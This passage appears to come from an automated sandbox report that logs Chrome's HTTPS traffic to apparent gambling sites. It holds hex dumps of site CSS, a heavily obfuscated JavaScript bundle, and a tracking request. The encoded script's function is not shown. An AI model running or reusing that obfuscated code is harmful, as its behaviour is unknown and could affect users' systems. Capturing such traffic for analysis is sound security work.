                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 34 64 65 36 20 2e 37 36 36 36 37 73 20 6c 69 6e 65 61 72 20 31 7d 2e 68 62 73 64 2d 32 34 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 74 6f 70 3a 31 30 30 25 3b 61 6e 69 6d 61 74 69 6f 6e 3a 48 6f 6e 67 62 61 6f 52 61 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 38 73 20 6c 69 6e 65 61 72 20 31 3b 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 3a 48 6f 6e 67 62 61 6f 52 61 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 38 73 20 6c 69 6e 65 61 72 20 31 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 48 6f 6e 67 62 61 6f 52 61 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 38 73 20 6c 69 6e 65 61 72 20 31 7d 2e 68 62 73 64 2d 32 35 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 74 6f 70 3a 31 30 30
                                                                                                                                                          Data Ascii: 4de6 .76667s linear 1}.hbsd-24[data-v-583e4de6]{top:100%;animation:HongbaoRain-data-v-583e4de6 .8s linear 1;-ms-animation:HongbaoRain-data-v-583e4de6 .8s linear 1;-webkit-animation:HongbaoRain-data-v-583e4de6 .8s linear 1}.hbsd-25[data-v-583e4de6]{top:100
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 61 70 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 35 72 65 6d 7d 2e 66 69 78 65 64 2d 68 62 2d 77 72 61 70 20 2e 67 72 69 64 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 77 69 64 74 68 3a 31 32 2e 35 25 3b 68 65 69 67 68 74 3a 31 36 2e 36 36 36 36 37 76 68 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 66 69 78 65 64 2d 68 62 2d 77 72 61 70 20 2e 67 72 69 64 20 2e 68 62 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 38 31 30 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 69 78 65 64 2d 68 62 2d 77 72 61 70 20 2e 67 72 69 64 20 2e 68 62 2e 73 68 61 6b 65 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 61 6e 69 6d 61 74 69 6f 6e 3a 53 68
                                                                                                                                                          Data Ascii: ap;margin-top:1.5rem}.fixed-hb-wrap .grid[data-v-583e4de6]{width:12.5%;height:16.66667vh;position:relative}.fixed-hb-wrap .grid .hb[data-v-583e4de6]{position:absolute;z-index:8100;cursor:pointer}.fixed-hb-wrap .grid .hb.shake[data-v-583e4de6]{animation:Sh
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 6c 5b 64 61 74 61 2d 76 2d 38 35 35 62 61 65 38 30 5d 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 6d 73 67 2d 62 6f 78 2d 6d 61 69 6e 20 2e 6d 73 67 2d 62 6f 78 2d 74 69 74 6c 65 20 2e 6e 6f 2d 72 65 6d 69 6e 64 20 2e 77 72 61 70 2d 6e 6f 2d 72 65 6d 69 6e 64 20 69 6e 70 75 74 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 5b 64 61 74 61 2d 76 2d 38 35 35 62 61 65 38 30 5d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 72 69 67 68 74 3a 2d 31 36 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 6d 73 67 2d 62 6f 78 2d 6d 61 69 6e 20 2e 6d 73 67 2d 62 6f 78 2d 74 69 74 6c 65 20 2e 6e 6f 2d 72 65 6d 69 6e 64 20 2e 77 72 61 70 2d 6e 6f 2d 72 65 6d 69
                                                                                                                                                          Data Ascii: l[data-v-855bae80]{margin-right:10px;font-size:18px;cursor:pointer}.msg-box-main .msg-box-title .no-remind .wrap-no-remind input[type=checkbox][data-v-855bae80]{position:relative;right:-16px;z-index:-1}.msg-box-main .msg-box-title .no-remind .wrap-no-remi
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 6f 6e 3a 2e 33 73 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 70 72 65 2d 6c 6f 67 69 6e 20 2e 63 6f 6d 6d 6f 6e 5f 6d 61 73 6b 7b 7a 2d 69 6e 64 65 78 3a 39 30 32 7d 2e 63 6f 6d 6d 6f 6e 5f 66 6c 65 78 2d 63 65 6e 74 65 72 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 66 61 64 65 2d 65 6e 74 65 72 2d 61 63 74 69 76 65 2c 2e 66 61 64 65 2d 6c 65 61 76 65
                                                                                                                                                          Data Ascii: on:.3s;-ms-flex-pack:center;justify-content:center}.pre-login .common_mask{z-index:902}.common_flex-center{display:-ms-flexbox;display:flex;-ms-flex-pack:center;justify-content:center;-ms-flex-align:center;align-items:center}.fade-enter-active,.fade-leave
                                                                                                                                                          2024-06-09 22:41:01 UTC16384INData Raw: 5f 70 61 75 73 65 5f 62 75 74 74 6f 6e 2c 2e 73 6b 69 74 74 65 72 2d 72 6f 75 6e 64 20 2e 70 72 65 76 5f 62 75 74 74 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 73 6b 69 74 74 65 72 2f 73 70 72 69 74 65 2d 72 6f 75 6e 64 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 37 70 78 20 61 75 74 6f 7d 2e 73 6b 69 74 74 65 72 2d 72 6f 75 6e 64 20 2e 70 72 65 76 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 3b 77 69 64 74 68 3a 32 33 70 78 3b 68 65 69 67 68 74 3a 34 37 70 78 3b 6c 65 66 74 3a 2d 32 33 70 78 7d 2e 73 6b 69 74 74 65 72 2d 72 6f 75 6e 64 20 2e 6e 65 78 74 5f 62 75
                                                                                                                                                          Data Ascii: _pause_button,.skitter-round .prev_button{display:block;background:url(/pc/image-pc/skitter/sprite-round.png) no-repeat;background-size:47px auto}.skitter-round .prev_button{background-position:0 0;width:23px;height:47px;left:-23px}.skitter-round .next_bu
                                                                                                                                                          2024-06-09 22:41:01 UTC16384INData Raw: 65 77 73 2f 35 38 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 7d 2e 6e 65 77 73 2d 68 65 61 64 65 72 2e 6e 65 77 73 2d 69 63 6f 6e 2d 35 39 5b 64 61 74 61 2d 76 2d 31 63 35 38 62 37 66 36 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 6e 65 77 73 2f 35 39 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 7d 2e 6e 65 77 73 2d 68 65 61 64 65 72 2e 6e 65 77 73 2d 69 63 6f 6e 2d 36 30 5b 64 61 74 61 2d 76 2d 31 63 35 38 62 37 66 36 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 6e 65 77 73 2f 36 30 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f
                                                                                                                                                          Data Ascii: ews/58.png);background-repeat:no-repeat}.news-header.news-icon-59[data-v-1c58b7f6]{background-image:url(/pc/image-pc/news/59.png);background-repeat:no-repeat}.news-header.news-icon-60[data-v-1c58b7f6]{background-image:url(/pc/image-pc/news/60.png);backgro
                                                                                                                                                          2024-06-09 22:41:01 UTC16384INData Raw: 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 6f 75 74 7d 40 6b 65 79 66 72 61 6d 65 73 20 6c 69 67 68 74 53 70 65 65 64 4f 75 74 7b 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 31 30 30 25 2c 30 2c 30 29 20 73 6b 65 77 58 28 33 30 64 65 67 29 3b 6f 70 61 63 69 74 79 3a 30 7d 7d 2e 6c 69 67 68 74 53 70 65 65 64 4f 75 74 7b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 6c 69 67 68 74 53 70 65 65 64 4f 75 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 69 6e 7d 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 49 6e 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 63 65 6e 74 65 72 3b 74 72
                                                                                                                                                          Data Ascii: ation-timing-function:ease-out}@keyframes lightSpeedOut{0%{opacity:1}to{transform:translate3d(100%,0,0) skewX(30deg);opacity:0}}.lightSpeedOut{animation-name:lightSpeedOut;animation-timing-function:ease-in}@keyframes rotateIn{0%{transform-origin:center;tr
                                                                                                                                                          2024-06-09 22:41:01 UTC16384INData Raw: 6e 67 29 7d 2e 67 61 6d 65 2d 6c 6f 62 62 79 2d 6e 65 77 20 2e 6e 61 76 20 2e 70 72 6f 76 69 64 65 72 2d 73 6c 69 64 65 20 2e 73 6c 69 64 65 2d 69 74 65 6d 20 2e 77 72 61 70 20 2e 74 68 69 72 64 2d 6d 65 6e 75 2e 62 73 2e 63 61 72 64 5b 64 61 74 61 2d 76 2d 65 33 31 35 62 65 31 63 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 63 61 72 64 2f 6c 6f 62 62 79 2f 6d 65 6e 75 2f 62 73 2e 70 6e 67 29 7d 2e 67 61 6d 65 2d 6c 6f 62 62 79 2d 6e 65 77 20 2e 6e 61 76 20 2e 70 72 6f 76 69 64 65 72 2d 73 6c 69 64 65 20 2e 73 6c 69 64 65 2d 69 74 65 6d 20 2e 77 72 61 70 20 2e 74 68 69 72 64 2d 6d 65 6e 75 2e 69 64 6e 2e 63 61 72 64 5b 64 61 74 61 2d 76 2d 65 33 31 35 62 65 31 63 5d 7b 62 61 63 6b 67 72 6f 75
                                                                                                                                                          Data Ascii: ng)}.game-lobby-new .nav .provider-slide .slide-item .wrap .third-menu.bs.card[data-v-e315be1c]{background-image:url(/pc/image-pc/card/lobby/menu/bs.png)}.game-lobby-new .nav .provider-slide .slide-item .wrap .third-menu.idn.card[data-v-e315be1c]{backgrou


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          215192.168.2.54996223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:00 UTC541OUTGET /pc/240516-03/static/js/common.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:00 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:00 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 127284
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:56:42 GMT
                                                                                                                                                          ETag: "6645ca4a-1f134"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[7],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE20[15],EU-FRA-paris-GLOBAL1-CACHE20[0,TCP_HIT,13],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2574274
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a5708af3647f460016a74e396cf85fae
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 17726
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:00 UTC15751INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 4a 67 47 5a 63 42 64 41 47 67 47 38 41 69 41 42 67 41 34 42 7a 41 5a 53 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 4a 6c 35 6b 51 5a 4e 41 45 70 71 6e 4a 43 41 41 45 53 58 67 43 64 2b 66 4b 67 47 34 51 41 4f 69 67 42 65 43 69 42 34 6f 41 4a 69 41 37 63 2b 67 74 4d 4b 6d 39 64 58 48 67 4b 47 38 70 41 4e 79 68 4b 35 59 74 47 53 56 6c 2b 36 75 77 6f 53 70 67 67 75 6c 52 55 76 72 71 38 57 67 41 32 68 67 79 38 41 42 62 69 75 6a 54 71 61 41 41 38 53 68 6b 41 31 4c 6b 53 6d 50 7a 52 57 6a 42 4a 48 67 44 43 4a 69 41 41 67 72 79 59 6b 68 49 41 66 4c 71 34 41 47 52 74 2f 4a 6d 74 2b 41 44 73 41 50 77 67 75 53 56 6c 48 6e 55 4e 45 71 7a 38 54 66
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJgGZcBdAGgG8AiABgA4BzAZSoC4AzAVzRgBcBLdJl5kQZNAEpqnJCAAESXgCd+fKgG4QAOigBeCiB4oAJiA7c+gtMKm9dXHgKG8pANyhK5YtGSVl+6uwoSpggulRUvrq8WgA2hgy8ABbiujTqaAA8ShkA1LkSmPzRWjBJHgDCJiAAgryYkhIAfLq4AGRt/Jmt+ADsAPwguSVlHnUNEqz8Tf
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 39 59 43 32 35 4a 67 58 4f 58 54 35 46 64 77 63 56 57 43 48 44 39 6b 72 32 49 46 64 48 5a 66 59 55 67 46 50 68 56 51 34 44 76 70 66 4d 76 72 41 62 4c 35 68 54 79 2b 73 32 67 48 51 4d 63 68 38 56 39 74 46 6c 65 71 62 4f 41 2b 30 6e 59 48 59 57 6d 6b 46 4d 79 44 73 50 46 55 74 36 33 33 73 79 45 51 37 77 6a 73 52 78 4d 47 4c 65 41 68 38 4b 6f 50 46 65 4c 57 38 7a 75 79 32 38 32 64 42 52 74 38 43 77 56 79 47 45 70 41 4b 6e 4f 6d 31 65 4e 4e 37 69 33 36 6b 51 76 48 51 39 44 74 66 34 4d 68 6d 69 4b 4f 39 70 41 59 78 66 52 4c 30 77 4d 65 4f 33 65 67 59 79 77 6f 68 76 59 67 63 47 44 45 46 44 6d 37 74 47 35 4d 4d 4b 38 46 7a 6b 34 58 47 66 50 30 68 52 4f 51 51 71 59 66 67 37 36 50 32 76 62 4b 72 4c 45 48 59 44 71 41 59 41 31 47 51 6f 69 63 35 44 46 72 58 7a 6e 33
                                                                                                                                                          Data Ascii: 9YC25JgXOXT5FdwcVWCHD9kr2IFdHZfYUgFPhVQ4DvpfMvrAbL5hTy+s2gHQMch8V9tFleqbOA+0nYHYWmkFMyDsPFUt633syEQ7wjsRxMGLeAh8KoPFeLW8zuy282dBRt8CwVyGEpAKnOm1eNN7i36kQvHQ9Dtf4MhmiKO9pAYxfRL0wMeO3egYywohvYgcGDEFDm7tG5MMK8Fzk4XGfP0hROQQqYfg76P2vbKrLEHYDqAYA1GQoic5DFrXzn3
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 45 46 35 43 50 38 2b 57 78 50 41 42 30 67 68 55 4a 41 51 45 64 34 42 58 53 55 38 6c 64 4a 6d 46 61 58 63 56 32 31 54 6a 4e 6a 71 62 2f 33 63 52 42 46 32 2f 52 39 4b 31 74 48 2f 6f 43 61 4c 6b 49 4d 56 63 55 39 78 67 4d 32 44 4c 45 4d 52 4d 32 75 55 44 4b 61 42 38 4c 6c 6f 62 33 7a 65 79 51 53 4e 51 78 76 41 77 6c 36 58 4b 69 44 77 56 48 57 66 4f 63 2b 43 4a 33 58 70 71 6e 61 6d 46 2b 6c 72 6c 72 71 49 50 34 64 65 45 6e 59 51 6f 65 46 56 59 41 55 6f 4c 52 6f 53 68 6a 49 51 38 78 6b 41 48 61 61 38 78 48 52 4c 49 57 53 46 35 41 70 75 4c 43 6c 4e 35 67 67 64 69 51 56 70 41 43 2f 73 36 33 4f 74 41 49 61 47 4e 35 2f 30 59 7a 74 30 33 74 55 4f 46 75 65 6d 73 4b 62 6b 4b 4b 51 50 54 38 4b 6a 79 52 75 6f 62 72 65 61 79 4d 6f 43 74 33 6e 51 67 65 74 5a 4d 67 58 35
                                                                                                                                                          Data Ascii: EF5CP8+WxPAB0ghUJAQEd4BXSU8ldJmFaXcV21TjNjqb/3cRBF2/R9K1tH/oCaLkIMVcU9xgM2DLEMRM2uUDKaB8Llob3zeyQSNQxvAwl6XKiDwVHWfOc+CJ3XpqnamF+lrlrqIP4deEnYQoeFVYAUoLRoShjIQ8xkAHaa8xHRLIWSF5ApuLClN5ggdiQVpAC/s63OtAIaGN5/0Yzt03tUOFuemsKbkKKQPT8KjyRuobreayMoCt3nQgetZMgX5
                                                                                                                                                          2024-06-09 22:41:00 UTC16384INData Raw: 72 4a 63 59 41 45 46 54 2f 4b 74 41 4c 36 42 5a 70 63 43 4c 47 6b 6e 5a 4b 58 4a 5a 44 4b 64 37 50 2f 4b 66 4a 5a 35 4c 51 4b 45 6e 4b 66 41 4b 41 72 35 35 55 7a 4b 41 4a 41 46 4c 6c 35 66 33 4c 6a 75 53 51 71 68 35 51 70 6a 39 5a 53 46 4c 41 70 51 77 42 71 46 5a 50 4c 6a 70 53 6b 41 65 46 53 74 79 2b 46 65 53 4c 52 67 49 53 4b 68 46 57 76 4c 53 46 57 49 71 41 6e 6c 46 4c 43 52 64 49 71 6a 70 65 65 79 54 51 4e 33 4c 56 5a 65 41 71 2b 46 58 53 4b 45 50 43 6c 4c 51 49 4d 51 72 64 5a 57 51 72 52 73 58 46 4b 7a 46 54 6f 71 68 5a 65 65 79 37 51 4c 4e 4c 38 70 53 41 42 53 70 51 2f 4b 6b 35 61 36 42 36 46 51 4b 4a 53 70 64 4b 79 75 66 48 6f 51 79 45 65 4d 38 6e 4a 4e 38 42 35 38 4f 4d 39 42 75 44 6f 42 51 69 55 55 44 48 6a 6b 65 51 61 2b 70 79 41 77 53 49 6f 7a
                                                                                                                                                          Data Ascii: rJcYAEFT/KtAL6BZpcCLGknZKXJZDKd7P/KfJZ5LQKEnKfAKAr55UzKAJAFLl5f3LjuSQqh5Qpj9ZSFLApQwBqFZPLjpSkAeFSty+FeSLRgISKhFWvLSFWIqAnlFLCRdIqjpeeyTQN3LVZeAq+FXSKEPClLQIMQrdZWQrRsXFKzFToqhZeey7QLNL8pSABSpQ/Kk5a6B6FQKJSpdKyufHoQyEeM8nJN8B58OM9BuDoBQiUUDHjkeQa+pyAwSIoz
                                                                                                                                                          2024-06-09 22:41:01 UTC16384INData Raw: 41 75 67 41 44 46 56 51 41 42 6f 52 68 30 34 34 36 38 53 32 49 6d 79 59 7a 7a 57 62 52 70 31 67 50 4c 35 62 55 43 7a 79 37 77 30 72 59 4f 58 64 4f 48 2f 64 65 6e 62 64 66 63 6d 67 46 77 78 76 30 6d 57 77 35 47 57 57 37 47 57 46 4b 32 6a 47 5a 6c 54 37 71 2b 70 54 48 37 74 73 39 6c 56 30 2f 52 36 33 6e 57 54 71 6a 49 59 39 76 74 51 69 4d 59 39 43 38 42 57 35 67 48 6c 65 41 77 36 33 6d 33 71 4f 51 71 6e 30 67 4f 39 6d 59 57 36 75 58 49 32 35 32 6e 38 4f 57 65 33 31 30 50 70 4a 6b 32 39 70 42 44 72 76 54 41 64 67 4e 4d 48 79 34 48 58 58 59 43 41 50 68 51 4f 37 41 5a 50 30 42 68 41 48 66 41 66 49 37 38 44 79 5a 59 4c 75 4b 63 4c 49 4f 7a 4e 6b 48 4e 5a 45 33 53 47 33 74 32 4c 4b 38 4a 79 39 44 35 77 76 59 68 37 59 4a 74 44 35 77 6b 61 55 2f 59 58 37 4c 34 49
                                                                                                                                                          Data Ascii: AugADFVQABoRh04468S2ImyYzzWbRp1gPL5bUCzy7w0rYOXdOH/denbdfcmgFwxv0mWw5GWW7GWFK2jGZlT7q+pTH7ts9lV0/R63nWTqjIY9vtQiMY9C8BW5gHleAw63m3qOQqn0gO9mYW6uXI252n8OWe310PpJk29pBDrvTAdgNMHy4HXXYCAPhQO7AZP0BhAHfAfI78DyZYLuKcLIOzNkHNZE3SG3t2LK8Jy9D5wvYh7YJtD5wkaU/YX7L4I
                                                                                                                                                          2024-06-09 22:41:01 UTC16384INData Raw: 4b 6b 30 37 57 48 42 66 67 38 68 4b 35 44 4d 50 6f 78 68 43 57 46 55 69 6f 43 49 69 64 79 47 4b 6b 5a 68 4d 2f 49 38 6d 4f 38 63 49 70 6a 76 48 46 4b 59 55 51 70 41 31 69 30 79 35 41 41 34 2b 50 63 4b 38 43 47 5a 41 4b 4a 68 61 61 48 49 49 56 49 41 54 32 48 33 59 62 78 68 64 32 47 73 50 4b 30 41 6b 30 69 43 37 4f 79 68 77 2b 43 45 49 5a 35 68 4f 6d 48 41 59 53 49 63 4f 30 37 45 6f 52 52 32 68 52 43 62 4c 74 56 4f 4a 41 44 6b 41 47 5a 68 36 4f 47 4a 78 50 43 36 71 61 5a 63 2b 4f 79 68 77 42 77 77 34 58 77 6f 5a 6d 46 77 34 55 70 41 6e 32 48 50 77 45 68 47 6a 67 4c 6c 77 49 66 41 4f 65 5a 30 67 56 6a 68 65 69 69 50 5a 75 51 57 69 4a 68 63 2b 4a 4f 68 59 43 71 74 45 4f 33 73 58 52 43 32 6b 44 39 68 59 2f 62 73 41 4f 4f 41 38 35 62 32 41 42 30 41 38 2b 41 54
                                                                                                                                                          Data Ascii: Kk07WHBfg8hK5DMPoxhCWFUioCIidyGKkZhM/I8mO8cIpjvHFKYUQpA1i0y5AA4+PcK8CGZAKJhaaHIIVIAT2H3Ybxhd2GsPK0Ak0iC7Oyhw+CEIZ5hOmHAYSIcO07EoRR2hRCbLtVOJADkAGZh6OGJxPC6qaZc+OyhwBww4XwoZmFw4UpAn2HPwEhGjgLlwIfAOeZ0gVjheiiPZuQWiJhc+JOhYCqtEO3sXRC2kD9hY/bsAOOA85b2AB0A8+AT
                                                                                                                                                          2024-06-09 22:41:01 UTC16384INData Raw: 4b 65 63 76 58 6c 6e 41 4b 4e 35 6a 66 46 47 6f 45 64 35 49 33 6b 7a 65 51 37 78 34 63 67 58 65 61 71 5a 56 33 6c 6e 41 4e 46 77 52 33 6e 69 41 4b 75 52 63 79 72 63 33 74 4a 49 37 33 6d 72 65 64 56 35 61 4f 47 2b 41 47 30 45 72 46 7a 6d 5a 74 41 52 52 47 49 31 67 42 7a 51 68 48 7a 42 38 49 4d 51 53 38 34 46 51 50 74 41 32 78 54 4e 51 49 4f 55 4b 53 67 32 73 4a 4e 41 4b 55 44 57 6c 4b 4a 53 6f 6d 43 69 6a 6f 50 57 62 31 6d 70 57 61 43 4b 6f 64 6e 47 42 4b 33 34 6a 34 4b 4e 37 6d 4f 2b 30 63 77 4c 64 42 70 55 6d 38 41 51 76 42 6a 35 76 41 44 37 34 68 70 55 30 37 45 4f 33 4d 78 5a 36 49 4a 45 2b 63 45 41 4a 50 6e 36 67 68 70 55 44 4d 5a 6c 61 62 41 6f 4c 62 6c 64 69 66 36 5a 6a 61 43 34 2b 62 56 67 4f 6b 41 38 71 4f 75 67 50 61 6e 79 72 42 63 6f 4e 61 35 55
                                                                                                                                                          Data Ascii: KecvXlnAKN5jfFGoEd5I3kzeQ7x4cgXeaqZV3lnANFwR3niAKuRcyrc3tJI73mredV5aOG+AG0ErFzmZtARRGI1gBzQhHzB8IMQS84FQPtA2xTNQIOUKSg2sJNAKUDWlKJSomCijoPWb1mpWaCKodnGBK34j4KN7mO+0cwLdBpUm8AQvBj5vAD74hpU07EO3MxZ6IJE+cEAJPn6ghpUDMZlabAoLbldif6ZjaC4+bVgOkA8qOugPanyrBcoNa5U
                                                                                                                                                          2024-06-09 22:41:01 UTC13229INData Raw: 51 2f 45 7a 4b 33 56 42 49 35 74 34 30 44 71 62 56 31 74 47 36 31 78 7a 63 4a 74 44 6d 32 74 62 52 32 74 51 32 33 52 32 4e 71 41 37 6d 33 62 72 64 65 6b 58 6d 33 6e 51 50 64 74 6c 64 68 74 72 63 39 74 55 30 44 46 62 55 6c 41 37 32 30 78 6e 4f 73 74 68 57 33 55 62 59 35 74 75 6e 6f 49 72 61 6a 38 41 6d 33 41 72 54 33 56 64 56 6a 4d 72 66 6c 35 77 71 30 70 51 4b 44 74 6e 31 67 75 62 51 31 74 57 36 42 74 31 58 33 56 30 4f 33 63 62 57 74 74 6e 68 6c 6e 62 62 46 74 59 4f 32 49 37 51 78 74 52 4b 31 32 62 54 64 74 55 57 30 43 6b 4a 4f 74 59 4f 30 4d 62 59 79 74 76 36 32 73 72 5a 5a 74 75 61 33 77 37 5a 7a 59 44 47 31 38 72 64 44 74 66 57 30 59 37 59 71 55 4a 4f 32 66 57 41 78 74 55 44 57 5a 62 59 39 41 4d 6d 30 4c 41 50 70 74 31 4b 33 73 32 4b 54 74 47 36 30 30
                                                                                                                                                          Data Ascii: Q/EzK3VBI5t40DqbV1tG61xzcJtDm2tbR2tQ23R2NqA7m3brdekXm3nQPdtldhtrc9tU0DFbUlA720xnOsthW3UbY5tunoIraj8Am3ArT3VdVjMrfl5wq0pQKDtn1gubQ1tW6Bt1X3V0O3cbWttnhlnbbFtYO2I7QxtRK12bTdtUW0CkJOtYO0MbYytv62srZZtua3w7ZzYDG18rdDtfW0Y7YqUJO2fWAxtUDWZbY9AMm0LAPpt1K3s2KTtG600


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          216192.168.2.549957103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:00 UTC617OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=wns732.cc&terminal=1&r=3425276221 HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://wns732.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
